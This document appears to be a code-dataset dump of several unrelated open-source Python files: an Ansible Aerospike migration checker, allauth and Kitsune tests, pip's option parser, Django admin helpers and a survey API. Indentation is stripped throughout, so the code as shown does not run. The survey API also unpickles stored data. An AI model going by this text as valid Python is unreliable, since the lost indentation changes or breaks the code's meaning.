if cluster_key not in cluster_keys:
cluster_keys[cluster_key] = 1
else:
cluster_keys[cluster_key] += 1
if len(cluster_keys.keys()) == 1 and \
self._start_cluster_key in cluster_keys:
return True
return False
def _cluster_migrates_allowed(self):
"""ensure all nodes have 'migrate_allowed' in their stats output"""
for node in self._nodes:
node_stats = self._info_cmd_helper('statistics', node)
allowed = node_stats['migrate_allowed']
if allowed == "false":
return False
return True
def _cluster_has_migs(self):
"""calls node_has_migs for each node"""
migs = 0
for node in self._nodes:
if self._node_has_migs(node):
migs += 1
if migs == 0:
return False
return True
def _has_migs(self, local):
if local:
return self._local_node_has_migs()
return self._cluster_has_migs()
def _local_node_has_migs(self):
return self._node_has_migs(None)
def _is_min_cluster_size(self):
"""checks that all nodes in the cluster are returning the
        minimum cluster size specified in their statistics output"""
sizes = set()
for node in self._cluster_statistics:
sizes.add(int(self._cluster_statistics[node]['cluster_size']))
if (len(sizes)) > 1: # if we are getting more than 1 size, lets say no
return False
if (min(sizes)) >= self.module.params['min_cluster_size']:
return True
return False
def _cluster_stable(self):
"""Added 4.3:
cluster-stable:size=<target-cluster-size>;ignore-migrations=<yes/no>;namespace=<namespace-name>
Returns the current 'cluster_key' when the following are satisfied:
If 'size' is specified then the target node's 'cluster-size'
must match size.
If 'ignore-migrations' is either unspecified or 'false' then
the target node's migrations counts must be zero for the provided
'namespace' or all namespaces if 'namespace' is not provided."""
cluster_key = set()
cluster_key.add(self._info_cmd_helper('statistics')['cluster_key'])
cmd = "cluster-stable:"
target_cluster_size = self.module.params['target_cluster_size']
if target_cluster_size is not None:
cmd = cmd + "size=" + str(target_cluster_size) + ";"
for node in self._nodes:
cluster_key.add(self._info_cmd_helper(cmd, node))
if len(cluster_key) == 1:
return True
return False
def _cluster_good_state(self):
"""checks a few things to make sure we're OK to say the cluster
has no migs. It could be in a unhealthy condition that does not allow
migs, or a split brain"""
if self._cluster_key_consistent() is not True:
return False, "Cluster key inconsistent."
if self._is_min_cluster_size() is not True:
return False, "Cluster min size not reached."
if self._cluster_migrates_allowed() is not True:
return False, "migrate_allowed is false somewhere."
return True, "OK."
def has_migs(self, local=True):
"""returns a boolean, False if no migrations otherwise True"""
consecutive_good = 0
try_num = 0
skip_reason = list()
while \
try_num < int(self.module.params['tries_limit']) and \
consecutive_good < \
int(self.module.params['consecutive_good_checks']):
self._update_nodes_list()
self._update_cluster_statistics()
# These checks are outside of the while loop because
# we probably want to skip & sleep instead of failing entirely
stable, reason = self._cluster_good_state()
if stable is not True:
skip_reason.append(
"Skipping on try#" + str(try_num) +
" for reason:" + reason
)
else:
if self._can_use_cluster_stable():
if self._cluster_stable():
consecutive_good += 1
else:
consecutive_good = 0
skip_reason.append(
"Skipping on try#" + str(try_num) +
" for reason:" + " cluster_stable"
)
elif self._has_migs(local):
# print("_has_migs")
skip_reason.append(
"Skipping on try#" + str(try_num) +
" for reason:" + " migrations"
)
consecutive_good = 0
else:
consecutive_good += 1
if consecutive_good == self.module.params[
'consecutive_good_checks']:
break
try_num += 1
sleep(self.module.params['sleep_between_checks'])
# print(skip_reason)
if consecutive_good == self.module.params['consecutive_good_checks']:
return False, None
return True, skip_reason
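# Hedged usage sketch (assumes `waiter` is an instance of the class above and
# `module` is its AnsibleModule, with tries_limit / consecutive_good_checks set):
#
#   busy, reasons = waiter.has_migs(local=False)
#   if busy:
#       module.fail_json(msg="migrations still in progress", reasons=reasons)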
def main():
"""main method for ansible module"""
run_module()
if __name__ == '__main__':
main()
| gpl-3.0 | -1,620,266,335,480,614,400 | 34.866157 | 103 | 0.574848 | false |
beswarm/django-allauth | allauth/socialaccount/providers/vk/tests.py | 71 | 1253 | from __future__ import absolute_import
from allauth.socialaccount.tests import create_oauth2_tests
from allauth.socialaccount.providers import registry
from allauth.tests import MockedResponse
from .provider import VKProvider
class VKTests(create_oauth2_tests(registry.by_id(VKProvider.id))):
def get_mocked_response(self, verified_email=True):
return MockedResponse(200, """
{"response": [{"last_name": "Penners", "university_name": "", "photo": "http://vk.com/images/camera_c.gif", "sex": 2, "photo_medium": "http://vk.com/images/camera_b.gif", "relation": "0", "timezone": 1, "photo_big": "http://vk.com/images/camera_a.gif", "uid": 219004864, "universities": [], "city": "1430", "first_name": "Raymond", "faculty_name": "", "online": 1, "counters": {"videos": 0, "online_friends": 0, "notes": 0, "audios": 0, "photos": 0, "followers": 0, "groups": 0, "user_videos": 0, "albums": 0, "friends": 0}, "home_phone": "", "faculty": 0, "nickname": "", "screen_name": "id219004864", "has_mobile": 1, "country": "139", "university": 0, "graduation": 0, "activity": "", "last_seen": {"time": 1377805189}}]}
""")
def get_login_response_json(self, with_refresh_token=True):
return '{"user_id": 219004864, "access_token":"testac"}'
| mit | -3,557,980,755,823,644,000 | 68.611111 | 724 | 0.661612 | false |
grivescorbett/heroku-buildpack-python | vendor/pip-pop/pip/baseparser.py | 424 | 10465 | """Base option parser setup"""
from __future__ import absolute_import
import sys
import optparse
import os
import re
import textwrap
from distutils.util import strtobool
from pip._vendor.six import string_types
from pip._vendor.six.moves import configparser
from pip.locations import (
legacy_config_file, config_basename, running_under_virtualenv,
site_config_files
)
from pip.utils import appdirs, get_terminal_size
_environ_prefix_re = re.compile(r"^PIP_", re.I)
class PrettyHelpFormatter(optparse.IndentedHelpFormatter):
"""A prettier/less verbose help formatter for optparse."""
def __init__(self, *args, **kwargs):
# help position must be aligned with __init__.parseopts.description
kwargs['max_help_position'] = 30
kwargs['indent_increment'] = 1
kwargs['width'] = get_terminal_size()[0] - 2
optparse.IndentedHelpFormatter.__init__(self, *args, **kwargs)
def format_option_strings(self, option):
return self._format_option_strings(option, ' <%s>', ', ')
def _format_option_strings(self, option, mvarfmt=' <%s>', optsep=', '):
"""
Return a comma-separated list of option strings and metavars.
:param option: tuple of (short opt, long opt), e.g: ('-f', '--format')
:param mvarfmt: metavar format string - evaluated as mvarfmt % metavar
:param optsep: separator
"""
opts = []
if option._short_opts:
opts.append(option._short_opts[0])
if option._long_opts:
opts.append(option._long_opts[0])
if len(opts) > 1:
opts.insert(1, optsep)
if option.takes_value():
metavar = option.metavar or option.dest.lower()
opts.append(mvarfmt % metavar.lower())
return ''.join(opts)
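    # Rough example (hypothetical option): short opt '-f', long opt '--format'
    # with a metavar of 'format' renders as "-f, --format <format>".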
def format_heading(self, heading):
if heading == 'Options':
return ''
return heading + ':\n'
def format_usage(self, usage):
"""
Ensure there is only one newline between usage and the first heading
if there is no description.
"""
msg = '\nUsage: %s\n' % self.indent_lines(textwrap.dedent(usage), " ")
return msg
def format_description(self, description):
# leave full control over description to us
if description:
if hasattr(self.parser, 'main'):
label = 'Commands'
else:
label = 'Description'
# some doc strings have initial newlines, some don't
description = description.lstrip('\n')
# some doc strings have final newlines and spaces, some don't
description = description.rstrip()
# dedent, then reindent
description = self.indent_lines(textwrap.dedent(description), " ")
description = '%s:\n%s\n' % (label, description)
return description
else:
return ''
def format_epilog(self, epilog):
# leave full control over epilog to us
if epilog:
return epilog
else:
return ''
def indent_lines(self, text, indent):
new_lines = [indent + line for line in text.split('\n')]
return "\n".join(new_lines)
class UpdatingDefaultsHelpFormatter(PrettyHelpFormatter):
"""Custom help formatter for use in ConfigOptionParser.
    This updates the defaults before expanding them, allowing
them to show up correctly in the help listing.
"""
def expand_default(self, option):
if self.parser is not None:
self.parser._update_defaults(self.parser.defaults)
return optparse.IndentedHelpFormatter.expand_default(self, option)
class CustomOptionParser(optparse.OptionParser):
def insert_option_group(self, idx, *args, **kwargs):
"""Insert an OptionGroup at a given position."""
group = self.add_option_group(*args, **kwargs)
self.option_groups.pop()
self.option_groups.insert(idx, group)
return group
@property
def option_list_all(self):
"""Get a list of all options, including those in option groups."""
res = self.option_list[:]
for i in self.option_groups:
res.extend(i.option_list)
return res
class ConfigOptionParser(CustomOptionParser):
"""Custom option parser which updates its defaults by checking the
configuration files and environmental variables"""
isolated = False
def __init__(self, *args, **kwargs):
self.config = configparser.RawConfigParser()
self.name = kwargs.pop('name')
self.isolated = kwargs.pop("isolated", False)
self.files = self.get_config_files()
if self.files:
self.config.read(self.files)
assert self.name
optparse.OptionParser.__init__(self, *args, **kwargs)
def get_config_files(self):
# the files returned by this method will be parsed in order with the
# first files listed being overridden by later files in standard
# ConfigParser fashion
config_file = os.environ.get('PIP_CONFIG_FILE', False)
if config_file == os.devnull:
return []
# at the base we have any site-wide configuration
files = list(site_config_files)
# per-user configuration next
if not self.isolated:
if config_file and os.path.exists(config_file):
files.append(config_file)
else:
# This is the legacy config file, we consider it to be a lower
# priority than the new file location.
files.append(legacy_config_file)
# This is the new config file, we consider it to be a higher
# priority than the legacy file.
files.append(
os.path.join(
appdirs.user_config_dir("pip"),
config_basename,
)
)
# finally virtualenv configuration first trumping others
if running_under_virtualenv():
venv_config_file = os.path.join(
sys.prefix,
config_basename,
)
if os.path.exists(venv_config_file):
files.append(venv_config_file)
return files
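    # Hedged illustration (when PIP_CONFIG_FILE is unset and not isolated):
    # site-wide configs are read first, then the legacy ~/.pip file, then the
    # appdirs-based user config, and finally a pip.conf inside the active
    # virtualenv, with later files overriding earlier ones.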
def check_default(self, option, key, val):
try:
return option.check_value(key, val)
except optparse.OptionValueError as exc:
print("An error occurred during configuration: %s" % exc)
sys.exit(3)
def _update_defaults(self, defaults):
"""Updates the given defaults with values from the config files and
the environ. Does a little special handling for certain types of
options (lists)."""
# Then go and look for the other sources of configuration:
config = {}
# 1. config files
for section in ('global', self.name):
config.update(
self.normalize_keys(self.get_config_section(section))
)
# 2. environmental variables
if not self.isolated:
config.update(self.normalize_keys(self.get_environ_vars()))
# Accumulate complex default state.
self.values = optparse.Values(self.defaults)
late_eval = set()
# Then set the options with those values
for key, val in config.items():
# ignore empty values
if not val:
continue
option = self.get_option(key)
# Ignore options not present in this parser. E.g. non-globals put
# in [global] by users that want them to apply to all applicable
# commands.
if option is None:
continue
if option.action in ('store_true', 'store_false', 'count'):
val = strtobool(val)
elif option.action == 'append':
val = val.split()
val = [self.check_default(option, key, v) for v in val]
elif option.action == 'callback':
late_eval.add(option.dest)
opt_str = option.get_opt_string()
val = option.convert_value(opt_str, val)
# From take_action
args = option.callback_args or ()
kwargs = option.callback_kwargs or {}
option.callback(option, opt_str, val, self, *args, **kwargs)
else:
val = self.check_default(option, key, val)
defaults[option.dest] = val
for key in late_eval:
defaults[key] = getattr(self.values, key)
self.values = None
return defaults
def normalize_keys(self, items):
"""Return a config dictionary with normalized keys regardless of
whether the keys were specified in environment variables or in config
files"""
normalized = {}
for key, val in items:
key = key.replace('_', '-')
if not key.startswith('--'):
key = '--%s' % key # only prefer long opts
normalized[key] = val
return normalized
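    # Example (illustrative only): the pairs [('timeout', '60'), ('index_url', 'x')]
    # normalize to {'--timeout': '60', '--index-url': 'x'}.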
def get_config_section(self, name):
"""Get a section of a configuration"""
if self.config.has_section(name):
return self.config.items(name)
return []
def get_environ_vars(self):
"""Returns a generator with all environmental vars with prefix PIP_"""
for key, val in os.environ.items():
if _environ_prefix_re.search(key):
yield (_environ_prefix_re.sub("", key).lower(), val)
def get_default_values(self):
"""Overridding to make updating the defaults after instantiation of
the option parser possible, _update_defaults() does the dirty work."""
if not self.process_default_values:
# Old, pre-Optik 1.5 behaviour.
return optparse.Values(self.defaults)
defaults = self._update_defaults(self.defaults.copy()) # ours
for option in self._get_all_options():
default = defaults.get(option.dest)
if isinstance(default, string_types):
opt_str = option.get_opt_string()
defaults[option.dest] = option.check_value(opt_str, default)
return optparse.Values(defaults)
def error(self, msg):
self.print_usage(sys.stderr)
self.exit(2, "%s\n" % msg)
| mit | 2,216,669,898,507,339,300 | 34.839041 | 79 | 0.587291 | false |
robovm/robovm-studio | python/lib/Lib/site-packages/django/contrib/admin/helpers.py | 78 | 13324 | from django import forms
from django.conf import settings
from django.contrib.admin.util import flatten_fieldsets, lookup_field
from django.contrib.admin.util import display_for_field, label_for_field
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from django.db.models.fields.related import ManyToManyRel
from django.forms.util import flatatt
from django.template.defaultfilters import capfirst
from django.utils.encoding import force_unicode, smart_unicode
from django.utils.html import escape, conditional_escape
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
ACTION_CHECKBOX_NAME = '_selected_action'
class ActionForm(forms.Form):
action = forms.ChoiceField(label=_('Action:'))
select_across = forms.BooleanField(label='', required=False, initial=0,
widget=forms.HiddenInput({'class': 'select-across'}))
checkbox = forms.CheckboxInput({'class': 'action-select'}, lambda value: False)
class AdminForm(object):
def __init__(self, form, fieldsets, prepopulated_fields, readonly_fields=None, model_admin=None):
self.form, self.fieldsets = form, normalize_fieldsets(fieldsets)
self.prepopulated_fields = [{
'field': form[field_name],
'dependencies': [form[f] for f in dependencies]
} for field_name, dependencies in prepopulated_fields.items()]
self.model_admin = model_admin
if readonly_fields is None:
readonly_fields = ()
self.readonly_fields = readonly_fields
def __iter__(self):
for name, options in self.fieldsets:
yield Fieldset(self.form, name,
readonly_fields=self.readonly_fields,
model_admin=self.model_admin,
**options
)
def first_field(self):
try:
fieldset_name, fieldset_options = self.fieldsets[0]
field_name = fieldset_options['fields'][0]
if not isinstance(field_name, basestring):
field_name = field_name[0]
return self.form[field_name]
except (KeyError, IndexError):
pass
try:
return iter(self.form).next()
except StopIteration:
return None
def _media(self):
media = self.form.media
for fs in self:
media = media + fs.media
return media
media = property(_media)
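# Illustrative only: ModelAdmin typically builds this wrapper roughly as
#   AdminForm(form, fieldsets, prepopulated_fields, readonly_fields, model_admin)
# and the change-form template iterates it to render one Fieldset per entry.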
class Fieldset(object):
def __init__(self, form, name=None, readonly_fields=(), fields=(), classes=(),
description=None, model_admin=None):
self.form = form
self.name, self.fields = name, fields
self.classes = u' '.join(classes)
self.description = description
self.model_admin = model_admin
self.readonly_fields = readonly_fields
def _media(self):
if 'collapse' in self.classes:
js = ['js/jquery.min.js', 'js/jquery.init.js', 'js/collapse.min.js']
return forms.Media(js=['%s%s' % (settings.ADMIN_MEDIA_PREFIX, url) for url in js])
return forms.Media()
media = property(_media)
def __iter__(self):
for field in self.fields:
yield Fieldline(self.form, field, self.readonly_fields, model_admin=self.model_admin)
class Fieldline(object):
def __init__(self, form, field, readonly_fields=None, model_admin=None):
self.form = form # A django.forms.Form instance
if not hasattr(field, "__iter__"):
self.fields = [field]
else:
self.fields = field
self.model_admin = model_admin
if readonly_fields is None:
readonly_fields = ()
self.readonly_fields = readonly_fields
def __iter__(self):
for i, field in enumerate(self.fields):
if field in self.readonly_fields:
yield AdminReadonlyField(self.form, field, is_first=(i == 0),
model_admin=self.model_admin)
else:
yield AdminField(self.form, field, is_first=(i == 0))
def errors(self):
return mark_safe(u'\n'.join([self.form[f].errors.as_ul() for f in self.fields if f not in self.readonly_fields]).strip('\n'))
class AdminField(object):
def __init__(self, form, field, is_first):
self.field = form[field] # A django.forms.BoundField instance
self.is_first = is_first # Whether this field is first on the line
self.is_checkbox = isinstance(self.field.field.widget, forms.CheckboxInput)
def label_tag(self):
classes = []
if self.is_checkbox:
classes.append(u'vCheckboxLabel')
contents = force_unicode(escape(self.field.label))
else:
contents = force_unicode(escape(self.field.label)) + u':'
if self.field.field.required:
classes.append(u'required')
if not self.is_first:
classes.append(u'inline')
attrs = classes and {'class': u' '.join(classes)} or {}
return self.field.label_tag(contents=contents, attrs=attrs)
def errors(self):
return mark_safe(self.field.errors.as_ul())
class AdminReadonlyField(object):
def __init__(self, form, field, is_first, model_admin=None):
label = label_for_field(field, form._meta.model, model_admin)
# Make self.field look a little bit like a field. This means that
# {{ field.name }} must be a useful class name to identify the field.
# For convenience, store other field-related data here too.
if callable(field):
class_name = field.__name__ != '<lambda>' and field.__name__ or ''
else:
class_name = field
self.field = {
'name': class_name,
'label': label,
'field': field,
}
self.form = form
self.model_admin = model_admin
self.is_first = is_first
self.is_checkbox = False
self.is_readonly = True
def label_tag(self):
attrs = {}
if not self.is_first:
attrs["class"] = "inline"
label = self.field['label']
contents = capfirst(force_unicode(escape(label))) + u":"
return mark_safe('<label%(attrs)s>%(contents)s</label>' % {
"attrs": flatatt(attrs),
"contents": contents,
})
def contents(self):
from django.contrib.admin.templatetags.admin_list import _boolean_icon
from django.contrib.admin.views.main import EMPTY_CHANGELIST_VALUE
field, obj, model_admin = self.field['field'], self.form.instance, self.model_admin
try:
f, attr, value = lookup_field(field, obj, model_admin)
except (AttributeError, ValueError, ObjectDoesNotExist):
result_repr = EMPTY_CHANGELIST_VALUE
else:
if f is None:
boolean = getattr(attr, "boolean", False)
if boolean:
result_repr = _boolean_icon(value)
else:
result_repr = smart_unicode(value)
if getattr(attr, "allow_tags", False):
result_repr = mark_safe(result_repr)
else:
if value is None:
result_repr = EMPTY_CHANGELIST_VALUE
elif isinstance(f.rel, ManyToManyRel):
result_repr = ", ".join(map(unicode, value.all()))
else:
result_repr = display_for_field(value, f)
return conditional_escape(result_repr)
class InlineAdminFormSet(object):
"""
A wrapper around an inline formset for use in the admin system.
"""
def __init__(self, inline, formset, fieldsets, readonly_fields=None, model_admin=None):
self.opts = inline
self.formset = formset
self.fieldsets = fieldsets
self.model_admin = model_admin
if readonly_fields is None:
readonly_fields = ()
self.readonly_fields = readonly_fields
def __iter__(self):
for form, original in zip(self.formset.initial_forms, self.formset.get_queryset()):
yield InlineAdminForm(self.formset, form, self.fieldsets,
self.opts.prepopulated_fields, original, self.readonly_fields,
model_admin=self.model_admin)
for form in self.formset.extra_forms:
yield InlineAdminForm(self.formset, form, self.fieldsets,
self.opts.prepopulated_fields, None, self.readonly_fields,
model_admin=self.model_admin)
yield InlineAdminForm(self.formset, self.formset.empty_form,
self.fieldsets, self.opts.prepopulated_fields, None,
self.readonly_fields, model_admin=self.model_admin)
def fields(self):
fk = getattr(self.formset, "fk", None)
for i, field in enumerate(flatten_fieldsets(self.fieldsets)):
if fk and fk.name == field:
continue
if field in self.readonly_fields:
yield {
'label': label_for_field(field, self.opts.model, self.model_admin),
'widget': {
'is_hidden': False
},
'required': False
}
else:
yield self.formset.form.base_fields[field]
def _media(self):
media = self.opts.media + self.formset.media
for fs in self:
media = media + fs.media
return media
media = property(_media)
class InlineAdminForm(AdminForm):
"""
A wrapper around an inline form for use in the admin system.
"""
def __init__(self, formset, form, fieldsets, prepopulated_fields, original,
readonly_fields=None, model_admin=None):
self.formset = formset
self.model_admin = model_admin
self.original = original
if original is not None:
self.original_content_type_id = ContentType.objects.get_for_model(original).pk
self.show_url = original and hasattr(original, 'get_absolute_url')
super(InlineAdminForm, self).__init__(form, fieldsets, prepopulated_fields,
readonly_fields, model_admin)
def __iter__(self):
for name, options in self.fieldsets:
yield InlineFieldset(self.formset, self.form, name,
self.readonly_fields, model_admin=self.model_admin, **options)
def has_auto_field(self):
if self.form._meta.model._meta.has_auto_field:
return True
# Also search any parents for an auto field.
for parent in self.form._meta.model._meta.get_parent_list():
if parent._meta.has_auto_field:
return True
return False
def field_count(self):
# tabular.html uses this function for colspan value.
num_of_fields = 0
if self.has_auto_field():
num_of_fields += 1
num_of_fields += len(self.fieldsets[0][1]["fields"])
if self.formset.can_order:
num_of_fields += 1
if self.formset.can_delete:
num_of_fields += 1
return num_of_fields
def pk_field(self):
return AdminField(self.form, self.formset._pk_field.name, False)
def fk_field(self):
fk = getattr(self.formset, "fk", None)
if fk:
return AdminField(self.form, fk.name, False)
else:
return ""
def deletion_field(self):
from django.forms.formsets import DELETION_FIELD_NAME
return AdminField(self.form, DELETION_FIELD_NAME, False)
def ordering_field(self):
from django.forms.formsets import ORDERING_FIELD_NAME
return AdminField(self.form, ORDERING_FIELD_NAME, False)
class InlineFieldset(Fieldset):
def __init__(self, formset, *args, **kwargs):
self.formset = formset
super(InlineFieldset, self).__init__(*args, **kwargs)
def __iter__(self):
fk = getattr(self.formset, "fk", None)
for field in self.fields:
if fk and fk.name == field:
continue
yield Fieldline(self.form, field, self.readonly_fields,
model_admin=self.model_admin)
class AdminErrorList(forms.util.ErrorList):
"""
Stores all errors for the form/formsets in an add/change stage view.
"""
def __init__(self, form, inline_formsets):
if form.is_bound:
self.extend(form.errors.values())
for inline_formset in inline_formsets:
self.extend(inline_formset.non_form_errors())
for errors_in_inline_form in inline_formset.errors:
self.extend(errors_in_inline_form.values())
def normalize_fieldsets(fieldsets):
"""
Make sure the keys in fieldset dictionaries are strings. Returns the
normalized data.
"""
result = []
for name, options in fieldsets:
result.append((name, normalize_dictionary(options)))
return result
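# Hypothetical example: [(None, {u'fields': ('name',)})] is returned as
# [(None, {'fields': ('name',)})]; only the option-dict keys are coerced to str.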
def normalize_dictionary(data_dict):
"""
Converts all the keys in "data_dict" to strings. The keys must be
convertible using str().
"""
for key, value in data_dict.items():
if not isinstance(key, str):
del data_dict[key]
data_dict[str(key)] = value
return data_dict
| apache-2.0 | 2,401,198,676,081,120,000 | 37.845481 | 133 | 0.602372 | false |
turtleloveshoes/kitsune | kitsune/community/tests/test_api.py | 13 | 8753 | from datetime import datetime, timedelta
from nose.tools import eq_
from django.test.client import RequestFactory
from kitsune.community import api
from kitsune.products.tests import product
from kitsune.questions.tests import answer, answervote, question
from kitsune.search.tests import ElasticTestCase
from kitsune.users.tests import profile
from kitsune.wiki.tests import document, revision
class TestTopContributorsBase(ElasticTestCase):
"""Tests for the Community Hub top users API."""
def setUp(self):
super(TestTopContributorsBase, self).setUp()
self.factory = RequestFactory()
self.api = api.TopContributorsBase()
self.api.get_data = lambda request: {}
def test_invalid_filter_name(self):
req = self.factory.get('/', {'not_valid': 'wrong'})
self.api.request = req
self.api.get_filters()
eq_(self.api.warnings, ['Unknown filter not_valid'])
class TestTopContributorsQuestions(ElasticTestCase):
def setUp(self):
super(TestTopContributorsQuestions, self).setUp()
self.factory = RequestFactory()
self.api = api.TopContributorsQuestions()
def test_it_works(self):
u1 = profile().user
u2 = profile().user
a1 = answer(creator=u1, save=True) # noqa
a2 = answer(creator=u1, save=True)
a3 = answer(creator=u2, save=True)
a1.question.solution = a1
a1.question.save()
answervote(answer=a3, helpful=True, save=True)
self.refresh()
req = self.factory.get('/')
data = self.api.get_data(req)
eq_(data['count'], 2)
eq_(data['results'][0]['user']['username'], u1.username)
eq_(data['results'][0]['rank'], 1)
eq_(data['results'][0]['answer_count'], 2)
eq_(data['results'][0]['solution_count'], 1)
eq_(data['results'][0]['helpful_vote_count'], 0)
eq_(data['results'][0]['last_contribution_date'], a2.created.replace(microsecond=0))
eq_(data['results'][1]['user']['username'], u2.username)
eq_(data['results'][1]['rank'], 2)
eq_(data['results'][1]['answer_count'], 1)
eq_(data['results'][1]['solution_count'], 0)
eq_(data['results'][1]['helpful_vote_count'], 1)
eq_(data['results'][1]['last_contribution_date'], a3.created.replace(microsecond=0))
def test_filter_by_product(self):
u1 = profile().user
u2 = profile().user
p1 = product(save=True)
p2 = product(save=True)
q1 = question(product=p1, save=True)
answer(question=q1, creator=u1, save=True)
q2 = question(product=p2, save=True)
answer(question=q2, creator=u1, save=True)
q3 = question(product=p2, save=True)
answer(question=q3, creator=u2, save=True)
self.refresh()
req = self.factory.get('/', {'product': p1.slug})
data = self.api.get_data(req)
eq_(data['count'], 1)
eq_(data['results'][0]['user']['username'], u1.username)
eq_(data['results'][0]['answer_count'], 1)
def test_page_size(self):
u1 = profile().user
u2 = profile().user
q1 = question(save=True)
answer(question=q1, creator=u1, save=True)
q2 = question(save=True)
answer(question=q2, creator=u2, save=True)
self.refresh()
req = self.factory.get('/', {'page_size': 2})
data = self.api.get_data(req)
eq_(data['count'], 2)
eq_(len(data['results']), 2)
req = self.factory.get('/', {'page_size': 1})
data = self.api.get_data(req)
eq_(data['count'], 2)
eq_(len(data['results']), 1)
def test_filter_last_contribution(self):
u1 = profile().user
u2 = profile().user
today = datetime.now()
yesterday = today - timedelta(days=1)
day_before_yesterday = yesterday - timedelta(days=1)
answer(creator=u1, created=today, save=True)
answer(creator=u1, created=day_before_yesterday, save=True)
answer(creator=u2, created=day_before_yesterday, save=True)
self.refresh()
# Test 1
req = self.factory.get('/', {'last_contribution_date__gt': yesterday.strftime('%Y-%m-%d')})
data = self.api.get_data(req)
eq_(data['count'], 1)
eq_(data['results'][0]['user']['username'], u1.username)
# Even though only 1 contribution was made in the time range, this filter
# is only checking the last contribution time, so both are included.
eq_(data['results'][0]['answer_count'], 2)
# Test 2
req = self.factory.get('/', {'last_contribution_date__lt': yesterday.strftime('%Y-%m-%d')})
data = self.api.get_data(req)
eq_(data['count'], 1)
eq_(data['results'][0]['user']['username'], u2.username)
eq_(data['results'][0]['answer_count'], 1)
class TestTopContributorsLocalization(ElasticTestCase):
def setUp(self):
super(TestTopContributorsLocalization, self).setUp()
self.factory = RequestFactory()
self.api = api.TopContributorsLocalization()
def test_it_works(self):
u1 = profile().user
u2 = profile().user
r1 = revision(creator=u1, save=True) # noqa
r2 = revision(creator=u1, save=True)
r3 = revision(creator=u2, save=True)
r2.reviewer = u2
r2.save()
self.refresh()
req = self.factory.get('/')
data = self.api.get_data(req)
eq_(data['count'], 2)
eq_(data['results'][0]['user']['username'], u1.username)
eq_(data['results'][0]['rank'], 1)
eq_(data['results'][0]['revision_count'], 2)
eq_(data['results'][0]['review_count'], 0)
eq_(data['results'][0]['last_contribution_date'], r2.created.replace(microsecond=0))
eq_(data['results'][1]['user']['username'], u2.username)
eq_(data['results'][1]['rank'], 2)
eq_(data['results'][1]['revision_count'], 1)
eq_(data['results'][1]['review_count'], 1)
eq_(data['results'][1]['last_contribution_date'], r3.created.replace(microsecond=0))
def test_filter_by_product(self):
u1 = profile().user
u2 = profile().user
p1 = product(save=True)
p2 = product(save=True)
d1 = document(save=True)
d1.products.add(p1)
revision(document=d1, creator=u1, save=True)
d2 = document(save=True)
d2.products.add(p2)
revision(document=d2, creator=u1, save=True)
d3 = document(save=True)
d3.products.add(p2)
revision(document=d3, creator=u2, save=True)
self.refresh()
req = self.factory.get('/', {'product': p1.slug})
data = self.api.get_data(req)
eq_(data['count'], 1)
eq_(data['results'][0]['user']['username'], u1.username)
eq_(data['results'][0]['revision_count'], 1)
def test_page_size(self):
u1 = profile().user
u2 = profile().user
d1 = document(save=True)
revision(document=d1, creator=u1, save=True)
d2 = document(save=True)
revision(document=d2, creator=u2, save=True)
self.refresh()
req = self.factory.get('/', {'page_size': 2})
data = self.api.get_data(req)
eq_(data['count'], 2)
eq_(len(data['results']), 2)
req = self.factory.get('/', {'page_size': 1})
data = self.api.get_data(req)
eq_(data['count'], 2)
eq_(len(data['results']), 1)
def test_filter_last_contribution(self):
u1 = profile().user
u2 = profile().user
today = datetime.now()
yesterday = today - timedelta(days=1)
day_before_yesterday = yesterday - timedelta(days=1)
revision(creator=u1, created=today, save=True)
revision(creator=u1, created=day_before_yesterday, save=True)
revision(creator=u2, created=day_before_yesterday, save=True)
self.refresh()
# Test 1
req = self.factory.get('/', {'last_contribution_date__gt': yesterday.strftime('%Y-%m-%d')})
data = self.api.get_data(req)
eq_(data['count'], 1)
eq_(data['results'][0]['user']['username'], u1.username)
# Even though only 1 contribution was made in the time range, this filter
# is only checking the last contribution time, so both are included.
eq_(data['results'][0]['revision_count'], 2)
# Test 2
req = self.factory.get('/', {'last_contribution_date__lt': yesterday.strftime('%Y-%m-%d')})
data = self.api.get_data(req)
eq_(data['count'], 1)
eq_(data['results'][0]['user']['username'], u2.username)
eq_(data['results'][0]['revision_count'], 1)
| bsd-3-clause | 318,551,336,583,031,500 | 31.782772 | 99 | 0.583686 | false |
ISIFoundation/influenzanet-website | apps/survey/api/resources.py | 4 | 2676 | from tastypie.resources import ModelResource
from apps.survey.models import Profile, SurveyUser, Survey
from apps.survey.survey import parse_specification
from apps.survey.spec import Question, Branch, Else
from pickle import loads
from inspect import isclass
class EpiwebModelResource(ModelResource):
class Meta:
default_format = 'application/json'
include_resource_uri = False
allowed_methods = ['get']
def xmlify_spec(spec):
p = parse_specification(spec)
def a(s):
return str(s)
def t(tag, s):
return a('<%s>\n' % tag) + a(s) + a('</%s>\n' % tag)
def xo(options):
return reduce(lambda s,o: s+t('option', t('code', o[0]) + t('text', o[1])) ,
options, '')
def xs(f):
if not f:
return ''
if isinstance(f, str):
return f + '\n'
if isinstance(f, list) or isinstance(f, tuple):
return xs(f[0]) + xs(f[1:])
elif isinstance(f, Else):
return t('else', f.rules)
elif isinstance(f, Branch):
# Process condition here!!!
return t('branch', t('condition', f.condition) + t('rules', f.rules))
elif isclass(f) and issubclass(f, Question):
x = t('type', f.type)
x += t('question', f.question)
if 'options' in dir(f):
x += xo(f.options)
return t('item', x)
else:
            return t('unknown', type(f))
xml = t('survey', xs(p.rules))
return xml
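# Rough sketch of the generated shape (the tags depend entirely on the parsed
# spec, so this is illustrative only):
#   <survey><item><type>...</type><question>...</question>
#   <option><code>...</code><text>...</text></option></item></survey>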
## EIP resources
class GetUserProfile(EpiwebModelResource):
"""Takes global_id
Returns name, a_uids, code, report_ts
"""
class Meta:
resource_name = 'GetUserProfile'
queryset = Profile.objects.all()
# queryset = Profile.objects.filter(user__global_id="193807d8-4a30-4601-9bc5-bc59db1696cd")
filtering = ['user__global_id']
# fields = ['data']
def dehydrate(self, bundle):
id = bundle.data['id']
return loads(str(bundle.data['data']))
class GetReportSurvey(ModelResource):
"""Takes language int
Returns survey in XML format
"""
class Meta:
resource_name = 'GetReportSurvey'
queryset = Survey.objects.all()
fields = ['specification']
def dehydrate(self, bundle):
spec = bundle.data['specification']
xml = xmlify_spec(spec)
return xml
# return str(parse_specification(bundle.data['specification']))
class Report(ModelResource):
"""Takes uid and reportS
Returns status
"""
class Meta:
queryset = SurveyUser.objects.all()
allowed_methods = ['put']
| agpl-3.0 | -4,251,068,543,518,573,600 | 29.067416 | 99 | 0.575859 | false |
